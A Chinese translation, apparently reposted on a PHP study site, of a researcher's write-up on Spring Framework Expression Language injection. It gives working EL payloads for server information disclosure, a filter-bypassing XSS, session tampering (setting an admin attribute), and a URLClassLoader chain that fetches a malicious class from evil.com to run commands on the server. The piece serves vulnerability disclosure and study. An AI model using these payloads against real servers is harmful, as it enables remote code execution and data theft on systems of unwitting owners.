spring-远程代码注入 - 网站安全 - 自学php

Remote Code with

 

Expression Language Injection

Spring Framework脆弱性—DanAmodio

全世界超过22,000组织已经下载了131.4万过时的Spring Framework，使用在业务中

可能会存在风险。

 

在2011年，来自Minded Security 的Stefano Di Paola 和来自Aspect Security的

Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可

以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持，

以此来作为向下兼容的一种方式。因此在jsp2.0之前，EL 是不被支持的。这个功能在当前

版本中是默认打开的，应用程序使用了此模式描述是易受攻击的。

 

由于每个应用程序并不都会出现反射xss这种弱点，虽然很难量化它的深度和广度，但

我们根据Sonatype最新的统计知道，全世界超过22,000的组织下载Spring 3.0.5以下版

本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。

 

这些版本不支持禁用double EL resolution.

这个问题原来的影响是信息泄露，但是我将举例说明它如何在Glassfish 和其他包含

EL2.2容器上可能进行远程代码执行。

 

这是一个原始信息泄露的攻击例子：

请求：

ttp://vulnerable.com/foo?message=${applicationScope}

 

到达以下内容页面：

 

结果将输出一些包含内部服务器信息calsspath 和本地工作目录

 

你也可以做一些其他事情，如这样：

${9999+1}

 

还可以访问session 对象和beans

${employee.lastName}

 

在执行Glassfish上客户端应用程序的渗透测试时，我遇到了同样的模式，知道大概是

EL 注入，做了额外的测试后，确认了这一发现，同时延续下去，我想挖掘一些有滋味的东

西，比如XSS.

 

哎，应用程序的输入过滤终止了我的请求，因此去掉了]]标签

突发奇想，我想[我可以在JAVA中进行字符操纵，为什么我不试试利用EL来绕过过滤

呢？]

 

因此，我尝试了如下：

 

http://vulnerable.com/app?code=${param.foo.replaceAll([P],]Q])}foo=PPPP

 

P

 

我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用，所以返

回的文本被插入进了spring:message 标签。

 

这里是一个最终绕过过滤的实例：

 

http://www.2cto.com /app?code=${param.foo.replaceAll([P],]])}&foo=PscriptQalert(1);P/scriptQ

 

它运行的很好，接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为

什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?

 

经过一番研究，我学习到EL2.2 增加了方法调用。

 

我写了一个快速测试应用程序代码并且检测一些功能

${pageContext.request.getSession().setAttribute([account],]123456″)}

${pageContext.request.getSession().setAttribute([admin],true)}

 

好了，会话对象修改是一个明显的风险。我真的想接触到对象，但是我没有一个直接的

指向pageContext对象,也许我可以使用反射，像String.getClass().forName(string)？

[, 1234)}

${[].getClass().forName([java.lang.Runtime])}

 

哇，没有方法让它工作，由于可以接触到任何东西这可是灾难性的。不幸的是，它是不

可能调用newinstance()初始化许多危险类（如Runtime），由于它们没有提供默认的构造函

数，我们无法创建对象。当它请求null或者一个空数组，getMethods()[0].invoke()会有

一些问题。在传递数据到方法之前，EL 似乎是理解它为一个字符串字面值。我猜测是由于

方法签名invoke(Object obj, Object„ args)

 

Jeff Williams (Aspect Security 和OWASP核心创始人) ，Arshan,和我都思考这个问

题，以让它可以工作起来。

漏洞 利用：

 

我在墙上撞的我的脑袋bangbang响，我已经用尽了所有想法，现在我们公开这个，我

希望你们中的一些JAVA奇才告诉我我是如此的可笑。

 

这里有一些我试过的失败的用例，为了试图让它工作的用例：

 

 写文件到文件系统

 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.

 

我认为这些可以很好的工作，但是我不能找到合适的类来载入。

${pageContext.getClass().getClassLoader().loadClass([org.springframework.expression.spel.standard.SpelExpressionParser])}

 

javax.servlet. jsp .el.ELException: java.lang.ClassNotFoundException:

org.springframework.expression.spel.standard.SpelExpressionParser not found

by

org.glassfish.web.javax.servlet.jsp [194].

 

 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public

 利用反射来创建一个新的Runtime(and watch the world burn)

 

${pageContext.request.getSession().setAttribute([rtc],]".getClass().forName

([java.lang.Runtime])).getDeclaredConstructors()[0])}

${pageContext.request.getSession().getAttribute([rtc]).setAccessible(true)}

 

 使用java.lang.ProcessBuilder

 用表达式语言来评估表达式语言

Expression-ception ！ 在这点我想我快疯了，载体并没有任何实际意义.

 

${pageContext.getExpressionEvaluator().parseExpression([pageContext.request

[,]".getClass(),null)}

 

 创建一个ObjectInputStream，序列化一个类并将其作为一个参数发送（也有点疯狂）

我在使用一个空数组通过Method.invoke()时失败了很多次

[].getClass().forName([java.lang.Runtime]).getMethods()[5].invoke(param.foo

.getClass().forName([java.lang.Runtime]),]".getClass().forName([java.util.A

rrayList]).newInstance().toArray())

 

java.lang.IllegalArgumentException: wrong number of arguments

最后，有一天晚上我被绊倒在一个问题前：我能得到一个URLClassLoader，因此我可

以创建一个恶意class文件并且指向类装载器.

 

我写了一个JAVA 类，它试图打开服务器上的计算器，来证明远程代码执行：

 

public class Malicious {

public Malicious() {

try {

java.lang.Runtime.getRuntime().exec([open -a Calculator]); //Mac

java.lang.Runtime.getRuntime().exec([calc.exe]); //Win

} catch (Exception e) {

}

}

我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回

话中，因此它可以被使用.

 

${pageContext.request.getSession().setAttribute([arr],]".getClass().forName

([java.util.ArrayList]).newInstance())}

 

URLClassLoader 提供了一个newInstance 方法，它接受URL对象数组。我们需要创建

一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和

getResource(string) 方法，但是我们不可能直接创建一个新的实例。然而URI提供了一个

我们可以调用的create(string)方法，然后转换对一个URL对象。

 

${pageContext.request.getSession().getAttribute([arr]).add(pageContext.getServletContext().getResource([/]).toURI().create([http://evil.com/path/to/wh

ere/malicious/classfile/is/located/]).toURL())}

 

然后我们发现了一个到URLClassLoader指示器，因此newInstance 方法可以被调用，

恶意类文件被装载并创建，触发远程代码.

 

${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte

xt.request.getSession().getAttribute([arr]).toArray(pageContext.getClass().

getClassLoader().getParent().getURLs())).loadClass([Malicious]).newInstance

()}

 

​

 

查看更多关于spring-远程代码注入 - 网站安全 - 自学php的详细内容...